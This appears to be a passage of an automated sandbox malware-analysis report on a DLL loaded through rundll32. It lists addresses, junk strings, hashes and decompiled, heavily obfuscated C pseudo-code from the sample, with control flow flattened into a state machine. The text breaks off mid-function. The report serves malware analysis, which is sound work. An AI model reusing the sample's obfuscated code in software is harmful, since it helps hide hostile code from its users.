0x10013264
0x1001326f
0x1001327a
0x10013282
0x1001328d
0x100132a0
0x100132a7
0x100132b2
0x100132bd
0x100132c5
0x100132d0
0x100132e4
0x100132eb
0x100132f6
0x10013301
0x10013309
0x10013314
0x1001331c
0x10013329
0x1001332d
0x10013335
0x1001333d
0x10013345
0x1001334f
0x10013357
0x1001335f
0x10013367
0x10013373
0x10013376
0x10013382
0x10013386
0x1001338e
0x10013399
0x100133a1
0x100133ac
0x100133b7
0x100133c2
0x100133cd
0x100133d8
0x100133e0
0x100133e8
0x100133f0
0x100133f4
0x100133fc
0x10013404
0x10013409
0x10013411
0x10013419
0x10013424
0x1001342f
0x1001343a
0x10013445
0x10013451
0x10013456
0x1001345c
0x10013468
0x1001346d
0x10013473
0x1001347b
0x10013483
0x1001348c
0x10013491
0x10013497
0x1001349c
0x100134a4
0x100134b6
0x100134bb
0x100134c4
0x100134cf
0x100134d7
0x100134df
0x100134e7
0x100134ef
0x100134f7
0x100134ff
0x10013509
0x1001350a
0x10013514
0x1001351d
0x1001351d
0x10013525
0x10013525
0x10013525
0x10013525
0x1001352b
0x00000000
0x00000000
0x10013531
0x1001367a
0x1001367b
0x10013684
0x1001368a
0x100136a3
0x100136a7
0x100136ac
0x100136b1
0x10013853
0x100136b7
0x100136b7
0x00000000
0x100136b7
0x10013537
0x1001353d
0x10013847
0x10013543
0x10013549
0x1001365f
0x10013665
0x10013668
0x1001366d
0x10013670
0x00000000
0x1001354f
0x10013555
0x100135f6
0x10013603
0x10013620
0x10013627
0x1001362c
0x10013633
0x1001363b
0x00000000
0x1001355b
0x10013561
0x1001359b
0x100135ab
0x100135cc
0x100135d0
0x100135d5
0x100135dc
0x100135e4
0x00000000
0x10013563
0x10013565
0x00000000
0x1001356b
0x10013581
0x10013586
0x10013587
0x1001358c
0x10013591
0x10013594
0x00000000
0x10013594
0x10013565
0x10013561
0x10013555
0x10013549
0x1001353d
0x10013854
0x10013860
0x10013860
0x100136c7
0x1001380a
0x10013810
0x10013813
0x10013818
0x1001381b
0x00000000
0x100136cd
0x100136d3
0x100137ca
0x100137cc
0x100137d3
0x100137d8
0x100137df
0x100137e7
0x00000000
0x100136d9
0x100136df
0x10013720
0x10013735
0x1001374d
0x10013759
0x10013769
0x10013772
0x1001377a
0x1001377c
0x10013781
0x00000000
0x100136e1
0x100136e7
0x00000000
0x100136ed
0x100136fb
0x100136fc
0x10013701
0x10013706
0x10013709
0x1001370f
0x00000000
0x1001370f
0x10013709
0x100136e7
0x100136df
0x100136d3
0x00000000
0x1001381d
0x1001381d
0x00000000

Strings

r#, xrefs: 10013196
HhJ, xrefs: 1001332D
hdJ, xrefs: 10013259
ZL, xrefs: 100132F6
yv, xrefs: 10013133
o, xrefs: 10012FB0
dc, xrefs: 1001338E
R!, xrefs: 100132EB
Rf/6, xrefs: 100136E1
}|, xrefs: 10012F86
u , xrefs: 10012E8C
Rf/6, xrefs: 10012D32
MX, xrefs: 10013409
T@, xrefs: 10013087
[, xrefs: 1001349C
wRs;, xrefs: 1001381D
HE, xrefs: 1001300D

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: HE$HhJ$MX$R!$Rf/6$Rf/6$T@$ZL$dc$hdJ$r#$u $wRs;$yv$}|$[$o
API String ID: 0-3509968422
Opcode ID: e7b8b085107a089a3d8bc1f9fc3c6c7a66c211d45a1524affb0f43a85f090613
Instruction ID: 02b3423188211d7eb0edbd243557c15659b31b4508df237616c48544b626ccf6
Opcode Fuzzy Hash: e7b8b085107a089a3d8bc1f9fc3c6c7a66c211d45a1524affb0f43a85f090613
Instruction Fuzzy Hash: 21421572508381DFE368CF25C989A8BBBE1FBC4744F10891DE5D98A2A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10011F54, Relevance: 20.5, Strings: 16, Instructions: 480
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10011F54() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				intOrPtr* _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				intOrPtr* _t544;
				intOrPtr* _t546;
				void* _t548;
				intOrPtr _t553;
				signed int _t561;
				void* _t563;
				void* _t611;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t631;
				signed int _t632;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				intOrPtr _t636;
				intOrPtr _t637;
				intOrPtr* _t638;
				intOrPtr* _t639;
				signed int* _t643;
				void* _t645;

				_t643 =  &_v1764;
				_v1748 = 0x98af;
				_t563 = 0x341c9255;
				_v1748 = _v1748 * 7;
				_t639 = 0;
				_v1748 = _v1748 ^ 0x33c4fc6a;
				_v1748 = _v1748 ^ 0xcec25379;
				_v1748 = _v1748 ^ 0xfd0283f3;
				_v1568 = 0xb64c;
				_v1568 = _v1568 + 0xffff9221;
				_v1568 = _v1568 ^ 0x00005183;
				_v1604 = 0x97d2;
				_t620 = 0x42;
				_v1576 = 0;
				_v1604 = _v1604 * 0x6f;
				_v1604 = _v1604 ^ 0x0041f71d;
				_v1580 = 0x5148;
				_v1580 = _v1580 >> 0xc;
				_v1580 = _v1580 ^ 0x00007f87;
				_v1756 = 0xc57a;
				_v1756 = _v1756 + 0xffff54fa;
				_v1756 = _v1756 | 0x19e5fbb3;
				_v1756 = _v1756 / _t620;
				_v1756 = _v1756 ^ 0x00647e67;
				_v1640 = 0xb50d;
				_v1640 = _v1640 << 9;
				_t621 = 0x41;
				_v1640 = _v1640 * 0x47;
				_v1640 = _v1640 ^ 0x646d0846;
				_v1720 = 0x7e7;
				_v1720 = _v1720 + 0x2a55;
				_v1720 = _v1720 >> 0xf;
				_v1720 = _v1720 >> 4;
				_v1720 = _v1720 ^ 0x00002edc;
				_v1752 = 0x31bd;
				_v1752 = _v1752 * 0x1d;
				_v1752 = _v1752 / _t621;
				_v1752 = _v1752 << 7;
				_v1752 = _v1752 ^ 0x000b4669;
				_v1680 = 0x36d6;
				_t622 = 0x12;
				_v1680 = _v1680 / _t622;
				_t623 = 0x1e;
				_v1680 = _v1680 * 0x31;
				_v1680 = _v1680 ^ 0x0000a029;
				_v1688 = 0xae2f;
				_v1688 = _v1688 + 0xffffa442;
				_v1688 = _v1688 / _t623;
				_v1688 = _v1688 ^ 0x000029b8;
				_v1632 = 0x1e39;
				_v1632 = _v1632 >> 7;
				_v1632 = _v1632 | 0x288846e2;
				_v1632 = _v1632 ^ 0x288846c0;
				_v1664 = 0x27c3;
				_v1664 = _v1664 + 0xffff9f85;
				_v1664 = _v1664 + 0x7cc6;
				_v1664 = _v1664 ^ 0x000013af;
				_v1648 = 0xafe8;
				_v1648 = _v1648 >> 0xf;
				_t624 = 0x3f;
				_v1648 = _v1648 / _t624;
				_v1648 = _v1648 ^ 0x00000e26;
				_v1672 = 0xf75a;
				_v1672 = _v1672 + 0xf412;
				_v1672 = _v1672 >> 1;
				_v1672 = _v1672 ^ 0x0000e4b2;
				_v1744 = 0x3c3e;
				_v1744 = _v1744 >> 0x10;
				_v1744 = _v1744 | 0x62539d0c;
				_v1744 = _v1744 + 0x453b;
				_v1744 = _v1744 ^ 0x6253ef14;
				_v1736 = 0x2723;
				_v1736 = _v1736 >> 3;
				_v1736 = _v1736 + 0xffffd2a8;
				_t561 = 6;
				_v1736 = _v1736 / _t561;
				_v1736 = _v1736 ^ 0x2aaa9f1e;
				_v1612 = 0x4217;
				_t625 = 0x1d;
				_v1612 = _v1612 / _t625;
				_v1612 = _v1612 ^ 0x00007f8c;
				_v1624 = 0x9759;
				_t626 = 0x7e;
				_v1624 = _v1624 / _t626;
				_v1624 = _v1624 ^ 0x000013b3;
				_v1704 = 0x4b65;
				_v1704 = _v1704 + 0x130b;
				_v1704 = _v1704 | 0xba553358;
				_t627 = 0x59;
				_v1704 = _v1704 / _t627;
				_v1704 = _v1704 ^ 0x021795e6;
				_v1708 = 0x3a02;
				_t628 = 0x2a;
				_v1708 = _v1708 / _t628;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 + 0xffffd667;
				_v1708 = _v1708 ^ 0x00005b37;
				_v1628 = 0xa607;
				_v1628 = _v1628 + 0xbbc6;
				_v1628 = _v1628 + 0xfdc3;
				_v1628 = _v1628 ^ 0x0002773b;
				_v1636 = 0x89f1;
				_v1636 = _v1636 | 0x0603cf32;
				_t629 = 0x47;
				_v1636 = _v1636 / _t629;
				_v1636 = _v1636 ^ 0x0015921a;
				_v1644 = 0xa54b;
				_v1644 = _v1644 << 0xe;
				_v1644 = _v1644 | 0x4177bdd7;
				_v1644 = _v1644 ^ 0x6977f0d2;
				_v1608 = 0xb364;
				_v1608 = _v1608 | 0xe39fc53b;
				_v1608 = _v1608 ^ 0xe39fea4b;
				_v1616 = 0x2b18;
				_v1616 = _v1616 ^ 0xba2241df;
				_v1616 = _v1616 ^ 0xba22085a;
				_v1620 = 0x7c4c;
				_v1620 = _v1620 + 0x30e6;
				_v1620 = _v1620 ^ 0x0000fb20;
				_v1724 = 0xf2b7;
				_t630 = 0x36;
				_v1724 = _v1724 * 0x6a;
				_v1724 = _v1724 >> 8;
				_v1724 = _v1724 | 0xe698474e;
				_v1724 = _v1724 ^ 0xe6981857;
				_v1588 = 0x538c;
				_v1588 = _v1588 / _t630;
				_v1588 = _v1588 ^ 0x00004135;
				_v1652 = 0x4a38;
				_v1652 = _v1652 << 2;
				_t631 = 0x21;
				_v1652 = _v1652 * 0x2d;
				_v1652 = _v1652 ^ 0x003455ef;
				_v1660 = 0xf7ff;
				_v1660 = _v1660 << 9;
				_v1660 = _v1660 << 0xc;
				_v1660 = _v1660 ^ 0xffe034f4;
				_v1668 = 0x6d41;
				_v1668 = _v1668 ^ 0xd9255773;
				_v1668 = _v1668 >> 0x10;
				_v1668 = _v1668 ^ 0x000085c9;
				_v1740 = 0x69b1;
				_v1740 = _v1740 + 0x5f75;
				_v1740 = _v1740 + 0xffff59c5;
				_v1740 = _v1740 + 0xffffdf35;
				_v1740 = _v1740 ^ 0x00000de2;
				_v1676 = 0xcfe5;
				_v1676 = _v1676 / _t631;
				_v1676 = _v1676 | 0xce43aaa9;
				_v1676 = _v1676 ^ 0xce43d17a;
				_v1572 = 0x9051;
				_t632 = 0x28;
				_v1572 = _v1572 / _t632;
				_v1572 = _v1572 ^ 0x00007fb1;
				_v1596 = 0x7cb6;
				_t633 = 0x7b;
				_v1596 = _v1596 * 0x70;
				_v1596 = _v1596 ^ 0x00369ab1;
				_v1564 = 0xac11;
				_v1564 = _v1564 + 0xa6ba;
				_v1564 = _v1564 ^ 0x00010ece;
				_v1696 = 0x8386;
				_v1696 = _v1696 << 7;
				_v1696 = _v1696 / _t633;
				_v1696 = _v1696 | 0x63e2c348;
				_v1696 = _v1696 ^ 0x63e2ceb2;
				_v1656 = 0xf36;
				_v1656 = _v1656 + 0xf4a0;
				_v1656 = _v1656 ^ 0xa57ad337;
				_v1656 = _v1656 ^ 0xa57bfd99;
				_v1760 = 0x6073;
				_v1760 = _v1760 | 0x1318f247;
				_v1760 = _v1760 << 0xa;
				_v1760 = _v1760 >> 0xc;
				_v1760 = _v1760 ^ 0x00062ae8;
				_v1764 = 0x382c;
				_t634 = 0x1c;
				_t642 = _v1576;
				_v1764 = _v1764 * 0x64;
				_v1764 = _v1764 * 0x59;
				_v1764 = _v1764 + 0x253f;
				_v1764 = _v1764 ^ 0x07a0ddfb;
				_v1728 = 0xa809;
				_v1728 = _v1728 ^ 0x4e541c28;
				_v1728 = _v1728 | 0x47d50bb2;
				_v1728 = _v1728 + 0xba55;
				_v1728 = _v1728 ^ 0x4fd62748;
				_v1712 = 0xd580;
				_v1712 = _v1712 | 0x7bdadedc;
				_v1712 = _v1712 * 0x63;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 ^ 0x9242e778;
				_v1584 = 0x13a4;
				_v1584 = _v1584 + 0xef10;
				_v1584 = _v1584 ^ 0x00010bad;
				_v1692 = 0x2ffd;
				_v1692 = _v1692 * 0x15;
				_v1692 = _v1692 + 0x71b4;
				_t562 = _v1576;
				_v1692 = _v1692 / _t561;
				_v1692 = _v1692 ^ 0x00008b1f;
				_v1700 = 0x9697;
				_v1700 = _v1700 + 0xffff8565;
				_v1700 = _v1700 / _t634;
				_v1700 = _v1700 + 0xffffb93a;
				_v1700 = _v1700 ^ 0xffff9d01;
				_v1592 = 0x33cc;
				_v1592 = _v1592 + 0xffffbab2;
				_v1592 = _v1592 ^ 0xfff0ee41;
				_v1684 = 0x5e19;
				_t635 = 0x29;
				_v1684 = _v1684 * 0x51;
				_v1684 = _v1684 ^ 0xad57fcec;
				_v1684 = _v1684 ^ 0xad4a3907;
				_v1600 = 0x1783;
				_v1600 = _v1600 + 0x8fd3;
				_v1600 = _v1600 ^ 0x0000a754;
				_v1732 = 0xda9a;
				_v1732 = _v1732 + 0xffff8001;
				_v1732 = _v1732 + 0xa805;
				_v1732 = _v1732 ^ 0x4450582c;
				_v1732 = _v1732 ^ 0x44515a8c;
				_v1716 = 0xa603;
				_v1716 = _v1716 + 0xffff8379;
				_v1716 = _v1716 | 0xcb27255d;
				_t636 = _v1576;
				_v1716 = _v1716 / _t635;
				_v1716 = _v1716 ^ 0x04f477ae;
				while(1) {
					L1:
					_t611 = 0x5c;
					do {
						while(1) {
							L2:
							_t645 = _t563 - 0x2a2b5c97;
							if(_t645 > 0) {
								break;
							}
							if(_t645 == 0) {
								_t637 =  *0x10021fd8; // 0x0
								_t638 = _t637 + 0x22c;
								while(1) {
									__eflags =  *_t638 - _t611;
									if(__eflags == 0) {
										break;
									}
									_t638 = _t638 + 2;
									__eflags = _t638;
								}
								_t636 = _t638 + 2;
								_t563 = 0x2b91422d;
								continue;
							} else {
								if(_t563 == 0x42d4cfd) {
									E1001EF5D(_v1764, _v1728, _t642, _v1712);
									L13:
									_t563 = 0x15049efa;
									while(1) {
										L1:
										_t611 = 0x5c;
										goto L2;
									}
								} else {
									if(_t563 == 0xa21a706) {
										_push(_v1680);
										_push(_v1752);
										_push(_v1720);
										_t548 = E1000B871(0x10001594, _v1640, __eflags);
										E1001D87D( &_v1560, __eflags);
										_t553 =  *0x10021fd8; // 0x0
										_t456 = _t553 + 0x1c; // 0x1c
										E10011E0D(_t456, __eflags,  &_v1560, _v1688, _v1632,  &_v520, _t548, _v1664, 0x104,  &_v1040, _v1648, _v1672, _v1744);
										E1000717B(_v1736, _v1612, _v1624, _t548, _v1704);
										_t639 = _v1576;
										_t643 =  &(_t643[0x11]);
										_t563 = 0x2a2b5c97;
										while(1) {
											L1:
											_t611 = 0x5c;
											goto L2;
										}
									} else {
										if(_t563 == 0xbeb5b2a) {
											E1000F7EF(_t642, _t562, _v1564, _v1696, _v1656, _v1760);
											_t643 =  &(_t643[4]);
											_t563 = 0x42d4cfd;
											while(1) {
												L1:
												_t611 = 0x5c;
												goto L2;
											}
										} else {
											if(_t563 != 0x15049efa) {
												goto L27;
											} else {
												E1001EF5D(_v1584, _v1692, _t562, _v1700);
											}
										}
									}
								}
							}
							L9:
							return _t639;
						}
						__eflags = _t563 - 0x2b91422d;
						if(_t563 == 0x2b91422d) {
							_t544 = E100045DE(_t563, _v1708, _v1628, _t563, _v1592, _v1636);
							_t562 = _t544;
							_t643 =  &(_t643[4]);
							__eflags = _t544;
							if(__eflags == 0) {
								_t563 = 0x13bb3a84;
								_t611 = 0x5c;
								goto L27;
							} else {
								_t563 = 0x2d0d6c69;
								goto L1;
							}
						} else {
							__eflags = _t563 - 0x2d0d6c69;
							if(_t563 == 0x2d0d6c69) {
								_t546 = E10004764(_t563, _v1600, _v1716, _t563, _v1644, _v1608, _t562, _t563, _v1616, _v1620, _t636, _t636,  &_v520, _v1724, _v1588, _t563, _v1652, _v1660, _v1668, _v1732, _v1740, _v1676, _v1572, _v1684, _v1596);
								_t642 = _t546;
								_t643 =  &(_t643[0x18]);
								__eflags = _t546;
								if(__eflags == 0) {
									goto L13;
								} else {
									_t563 = 0xbeb5b2a;
									_t639 = 1;
									_v1576 = 1;
									while(1) {
										L1:
										_t611 = 0x5c;
										goto L2;
									}
								}
							} else {
								__eflags = _t563 - 0x341c9255;
								if(_t563 != 0x341c9255) {
									goto L27;
								} else {
									E1001BA7B(_v1748, _t563, _v1568, _v1604, _t563,  &_v1040, _v1580, _v1756);
									_t643 =  &(_t643[7]);
									_t563 = 0xa21a706;
									while(1) {
										L1:
										_t611 = 0x5c;
										goto L2;
									}
								}
							}
						}
						goto L9;
						L27:
						__eflags = _t563 - 0x13bb3a84;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x10011f54
0x10011f5a
0x10011f69
0x10011f72
0x10011f76
0x10011f78
0x10011f80
0x10011f88
0x10011f90
0x10011f9b
0x10011fa6
0x10011fb1
0x10011fc6
0x10011fc9
0x10011fd0
0x10011fd7
0x10011fe2
0x10011fed
0x10011ff5
0x10012000
0x10012008
0x10012010
0x10012020
0x10012024
0x1001202c
0x10012037
0x10012047
0x1001204a
0x10012051
0x1001205c
0x10012064
0x1001206c
0x10012071
0x10012076
0x1001207e
0x1001208b
0x10012097
0x1001209b
0x100120a0
0x100120a8
0x100120b4
0x100120b9
0x100120c4
0x100120c5
0x100120c9
0x100120d1
0x100120d9
0x100120e7
0x100120eb
0x100120f3
0x100120fe
0x10012106
0x10012111
0x1001211c
0x10012124
0x1001212c
0x10012134
0x1001213c
0x10012149
0x1001215a
0x1001215f
0x10012168
0x10012173
0x1001217b
0x10012183
0x10012187
0x1001218f
0x10012197
0x1001219c
0x100121a4
0x100121ac
0x100121b4
0x100121bc
0x100121c1
0x100121cd
0x100121d2
0x100121d8
0x100121e0
0x100121f2
0x100121f7
0x10012200
0x1001220b
0x1001221d
0x10012222
0x1001222b
0x10012236
0x1001223e
0x10012246
0x10012252
0x10012257
0x1001225d
0x10012265
0x10012271
0x10012276
0x1001227c
0x10012281
0x10012289
0x10012291
0x1001229c
0x100122a7
0x100122b2
0x100122bd
0x100122c8
0x100122da
0x100122dd
0x100122e4
0x100122ef
0x100122fa
0x10012302
0x1001230d
0x10012318
0x10012325
0x10012330
0x1001233b
0x10012346
0x10012351
0x1001235c
0x10012367
0x10012372
0x1001237d
0x1001238c
0x1001238f
0x10012393
0x10012398
0x100123a0
0x100123a8
0x100123be
0x100123c5
0x100123d0
0x100123db
0x100123eb
0x100123ee
0x100123f5
0x10012400
0x10012408
0x1001240d
0x10012412
0x1001241a
0x10012422
0x1001242a
0x1001242f
0x10012437
0x1001243f
0x10012447
0x1001244f
0x10012457
0x1001245f
0x1001246f
0x10012473
0x1001247b
0x10012483
0x10012495
0x1001249a
0x100124a3
0x100124ae
0x100124c1
0x100124c2
0x100124c9
0x100124d4
0x100124df
0x100124ea
0x100124f5
0x100124fd
0x10012508
0x1001250c
0x10012514
0x1001251c
0x10012524
0x1001252c
0x10012534
0x1001253c
0x10012544
0x1001254c
0x10012553
0x10012558
0x10012560
0x1001256f
0x10012572
0x10012579
0x10012582
0x10012586
0x1001258e
0x10012596
0x1001259e
0x100125a6
0x100125ae
0x100125b6
0x100125be
0x100125c6
0x100125d3
0x100125d7
0x100125dc
0x100125e4
0x100125ef
0x100125fa
0x10012605
0x10012612
0x10012616
0x10012626
0x1001262d
0x10012631
0x10012639
0x10012641
0x10012651
0x10012655
0x1001265d
0x10012665
0x10012670
0x1001267b
0x10012686
0x10012693
0x10012694
0x10012698
0x100126a0
0x100126a8
0x100126b3
0x100126be
0x100126c9
0x100126d1
0x100126d9
0x100126e1
0x100126e9
0x100126f1
0x100126f9
0x10012701
0x1001270f
0x10012716
0x1001271a
0x10012722
0x10012722
0x10012724
0x10012725
0x10012725
0x10012725
0x10012725
0x1001272b
0x00000000
0x00000000
0x10012731
0x10012880
0x10012886
0x10012891
0x10012891
0x10012894
0x00000000
0x00000000
0x1001288e
0x1001288e
0x1001288e
0x10012896
0x10012899
0x00000000
0x10012737
0x1001273d
0x1001286f
0x10012876
0x10012876
0x10012722
0x10012722
0x10012724
0x00000000
0x10012724
0x10012743
0x10012749
0x100127af
0x100127b8
0x100127bc
0x100127c7
0x100127d5
0x1001281c
0x10012821
0x1001282a
0x10012849
0x1001284e
0x10012855
0x10012858
0x10012722
0x10012722
0x10012724
0x00000000
0x10012724
0x1001274b
0x10012751
0x1001279d
0x100127a2
0x100127a5
0x10012722
0x10012722
0x10012724
0x00000000
0x10012724
0x10012753
0x10012759
0x00000000
0x1001275f
0x1001276f
0x10012775
0x10012759
0x10012751
0x10012749
0x1001273d
0x10012777
0x10012782
0x10012782
0x100128a3
0x100128a9
0x100129b2
0x100129b7
0x100129b9
0x100129bc
0x100129be
0x100129cc
0x100129d1
0x00000000
0x100129c0
0x100129c0
0x00000000
0x100129c0
0x100128af
0x100128af
0x100128b5
0x10012972
0x10012977
0x10012979
0x1001297c
0x1001297e
0x00000000
0x10012984
0x10012986
0x1001298b
0x1001298c
0x10012722
0x10012722
0x10012724
0x00000000
0x10012724
0x10012722
0x100128b7
0x100128b7
0x100128bd
0x00000000
0x100128c3
0x100128ea
0x100128ef
0x100128f2
0x10012722
0x10012722
0x10012724
0x00000000
0x10012724
0x10012722
0x100128bd
0x100128b5
0x00000000
0x100129d2
0x100129d2
0x100129d2
0x00000000
0x100129de

Strings

il-, xrefs: 100128AF
0, xrefs: 10012367
u_, xrefs: 1001243F
,XPD, xrefs: 100126E1
;E, xrefs: 100121A4
7[, xrefs: 10012289
HQ, xrefs: 10011FE2
il-, xrefs: 100129C0
g~d, xrefs: 10012024
U*, xrefs: 10012064
Am, xrefs: 1001241A
5A, xrefs: 100123C5
eK, xrefs: 10012236
,8, xrefs: 10012560
U4, xrefs: 100123F5
?%, xrefs: 10012586

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,8$,XPD$5A$7[$;E$?%$Am$HQ$U*$eK$g~d$il-$il-$u_$0$U4
API String ID: 0-1960404279
Opcode ID: 21da28d209ac10a0d5f7e9f97de353580e1d808643eefd627ba81257b705a496
Instruction ID: ff8e55aa577eb08746f9238c10e00bf9128a960d7b6596c284452111871a0936
Opcode Fuzzy Hash: 21da28d209ac10a0d5f7e9f97de353580e1d808643eefd627ba81257b705a496
Instruction Fuzzy Hash: 5742F27150D3819FE364CF65C949A9FBBE1FBC4318F10891DE2999A2A0D7B98949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 10018C4D, Relevance: 20.4, Strings: 16, Instructions: 436
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10018C4D() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				void* _t495;
				void* _t499;
				intOrPtr _t504;
				void* _t516;
				signed int _t517;
				intOrPtr _t518;
				intOrPtr* _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				void* _t531;
				void* _t577;
				signed int* _t583;

				_t583 =  &_v1776;
				_v1608 = 0x884a;
				_v1608 = _v1608 << 9;
				_v1608 = _v1608 ^ 0x01109429;
				_v1596 = 0x7b1d;
				_v1596 = _v1596 + 0xa78;
				_v1596 = _v1596 ^ 0x80008594;
				_v1736 = 0x14f6;
				_v1736 = _v1736 << 0xc;
				_v1736 = _v1736 | 0xc525c0ca;
				_v1736 = _v1736 + 0xffffef29;
				_v1736 = _v1736 ^ 0xc56fcff1;
				_v1616 = 0x1cc8;
				_v1616 = _v1616 ^ 0xfa492c17;
				_v1616 = _v1616 ^ 0xfa49477b;
				_v1624 = 0xe926;
				_v1624 = _v1624 | 0xaeb1a1d5;
				_v1624 = _v1624 ^ 0xaeb19267;
				_v1632 = 0x614e;
				_v1568 = 0;
				_t577 = 0x4ab133b;
				_t520 = 0x28;
				_v1632 = _v1632 / _t520;
				_v1632 = _v1632 ^ 0x00000e43;
				_v1676 = 0x1560;
				_v1676 = _v1676 + 0xffffdf26;
				_v1676 = _v1676 | 0xf7bcc2cd;
				_v1676 = _v1676 ^ 0xffffcf95;
				_v1748 = 0xd09f;
				_v1748 = _v1748 | 0x2d60ca3d;
				_v1748 = _v1748 >> 4;
				_v1748 = _v1748 | 0xa23db4a0;
				_v1748 = _v1748 ^ 0xa2ff8578;
				_v1576 = 0x641f;
				_t521 = 0x50;
				_v1576 = _v1576 / _t521;
				_v1576 = _v1576 ^ 0x000039de;
				_v1612 = 0x7028;
				_v1612 = _v1612 << 1;
				_v1612 = _v1612 ^ 0x00008d5d;
				_v1572 = 0xd491;
				_v1572 = _v1572 * 0x3b;
				_v1572 = _v1572 ^ 0x0030fa43;
				_v1772 = 0xaff5;
				_v1772 = _v1772 >> 0xe;
				_v1772 = _v1772 << 8;
				_v1772 = _v1772 + 0x548e;
				_v1772 = _v1772 ^ 0x000020e4;
				_v1648 = 0x2c13;
				_v1648 = _v1648 * 0x7e;
				_v1648 = _v1648 ^ 0x00159b83;
				_v1776 = 0x4146;
				_v1776 = _v1776 >> 2;
				_v1776 = _v1776 | 0x15287597;
				_v1776 = _v1776 * 0x49;
				_v1776 = _v1776 ^ 0x0889ad78;
				_v1656 = 0x64b1;
				_v1656 = _v1656 + 0x70f3;
				_v1656 = _v1656 ^ 0x0000f7ce;
				_v1660 = 0x86b2;
				_v1660 = _v1660 | 0xb5cb9783;
				_v1660 = _v1660 ^ 0xb5cbdd49;
				_v1740 = 0x6a70;
				_t522 = 0x39;
				_v1740 = _v1740 / _t522;
				_v1740 = _v1740 >> 7;
				_v1740 = _v1740 ^ 0xc4ce2602;
				_v1740 = _v1740 ^ 0xc4ce459b;
				_v1684 = 0xdf3d;
				_v1684 = _v1684 + 0xca9b;
				_v1684 = _v1684 >> 9;
				_v1684 = _v1684 ^ 0x000043ad;
				_v1692 = 0x1da0;
				_v1692 = _v1692 >> 0x10;
				_v1692 = _v1692 << 0x10;
				_v1692 = _v1692 ^ 0x00007d7c;
				_v1640 = 0xda8c;
				_v1640 = _v1640 ^ 0x9912609d;
				_v1640 = _v1640 ^ 0x9912edd9;
				_v1700 = 0x1432;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 | 0xa166176b;
				_v1700 = _v1700 ^ 0xa16650a0;
				_v1644 = 0x239c;
				_t523 = 0x66;
				_v1644 = _v1644 * 0x56;
				_v1644 = _v1644 ^ 0x000ba034;
				_v1752 = 0x2ff9;
				_v1752 = _v1752 ^ 0x936579ad;
				_v1752 = _v1752 ^ 0xbe4431f2;
				_v1752 = _v1752 / _t523;
				_v1752 = _v1752 ^ 0x00712681;
				_v1696 = 0xba14;
				_v1696 = _v1696 | 0xfa20580e;
				_v1696 = _v1696 << 4;
				_v1696 = _v1696 ^ 0xa20ff228;
				_v1716 = 0x830b;
				_v1716 = _v1716 + 0x216b;
				_v1716 = _v1716 | 0xffd9e4bf;
				_v1716 = _v1716 ^ 0xffd9add6;
				_v1628 = 0xfd4e;
				_v1628 = _v1628 << 0xe;
				_v1628 = _v1628 ^ 0x3f53bfb8;
				_v1728 = 0x8ab0;
				_v1728 = _v1728 + 0xffff810d;
				_t524 = 0x1a;
				_v1728 = _v1728 * 0x6a;
